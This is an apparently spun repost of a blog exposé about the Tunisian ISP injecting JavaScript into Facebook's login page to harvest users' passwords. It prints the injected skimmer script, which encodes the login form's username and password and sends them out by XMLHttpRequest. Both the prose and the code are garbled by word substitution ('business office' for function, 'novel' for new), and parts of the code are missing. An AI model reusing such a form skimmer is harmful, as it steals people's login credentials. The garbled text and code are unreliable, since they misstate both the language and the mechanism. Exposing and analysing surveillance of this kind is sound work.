Exposure : How Does The Tunisian Regime Pocket Passwords On Facebook !

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You maybe conduct maintain followed the recent actualities close Tunisian Government stealing accounts on facebook.
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There’s how they do:
Here’s the spider web page of Facebook every bit seen when you’re connected inwards Tunisia
Let’s accept a await at that javascript curious part..

!-- business office h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} business office r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); render st;} business office hAAAQ3d() {  var frm = document.getElementById("login_form"); var us3r =; var pa55 = frm.pass.value;  var url = ""+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);} business office inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;} business office inv0k2(url) {var xr = novel XMLHttpRequest();"GET", url, false); xr.send("");} business office inv0k3(url) {var xr = novel ActiveXObject('Microsoft.XMLHTTP');"GET", url, false); xr.send("");} //-->

This code is injected past times the Internet access provider (Internet service provider) itself together with appears inwards no others country, this JS code create a inquiry to amongst the username together with password inwards clear, the “wo0dh3ad” page of class don’t be on facebook’s server, but the Internet access provider could merely create an “grep wo0dh3ad /var/log/FAI.log” to larn all the passwords of their subscribers inwards clear.

Original post past times @r00tBSD :

News Source : Jerry Hassan
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